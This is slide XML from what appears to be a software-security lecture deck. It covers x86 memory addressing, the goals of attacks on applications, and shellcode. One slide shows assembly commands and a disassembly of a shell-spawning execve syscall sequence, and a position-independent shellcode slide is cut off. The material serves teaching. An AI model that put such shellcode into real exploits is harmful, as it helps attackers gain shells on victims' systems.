              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="210035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5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5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57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57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57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57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579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4579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4579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4579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4579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45795">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4579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Preliminary </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Shellcode</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>gcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> -m32 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>preliminary_shellcode.s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> -o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>prelim</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="1800" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>objdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> -D </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>prelim</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="1800" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="de-DE" sz="1800" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>08048394 &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>main</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>&gt;: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>8048394:       b8 0b 00 00 00          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>    $0xb,%eax </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>8048399:       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>bb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> 1c 96 04 08          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>    $0x804961c,%ebx </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>804839e:       6a 00                   push   $0x0 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>80483a0:       68 1c 96 04 08          push   $0x804961c </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>80483a5:       89 e1                   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>    %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>,%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>80483a7:       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>ba</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> 00 00 00 00          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>    $0x0,%edx </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>80483ac:       cd 80                   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>    $0x80 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>80483ae:       b8 01 00 00 00          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>    $0x1,%eax </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>80483b3:       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>bb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> 00 00 00 00          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>    $0x0,%ebx </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>80483b8:       cd 80                   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>    $0x80</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FCFB7E3C-6220-8942-988C-3F6E25750AD7}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>199</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6308203" y="3240911"/>
            <a:ext cx="1284789" cy="358816"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="508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308203" y="3782289"/>
            <a:ext cx="1284789" cy="358816"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="508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643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Security</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Applications provide services</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Locally (word processing, file management)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Remotely (network services)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The behavior of an application is determined by the code being executed, the data being processed, and the environment in which the application is run</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attacks against applications aim at bringing applications to execute operations that violate the security of the system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Violation of confidentiality</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Violation of integrity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Violation of availability</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="93583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6597" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Memory Addressing in x86</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1006598" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Users access memory with 32-bit addresses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Flat memory model: Memory is considered a single, continuous address space from 0 to 2^32 -1 (4GB)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Segmented memory model: Memory is a group of independent address spaces called segments, each addressable separately</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Real-address mode model: Memory model used for compatibility with 8086 CPUs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>The memory architecture is paged (4K pages)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1006600" name="Picture 8" descr="memorymodels"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4495801" y="2171700"/>
            <a:ext cx="4358833" cy="3339063"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27905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65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65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659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0659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0659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066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Position Independent </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Shellcode</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="55000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>.text</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>globl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> main</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>main</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>:	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> 	$11,</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	</a:t>
            </a:r>
          </a:p>
          <a:p>
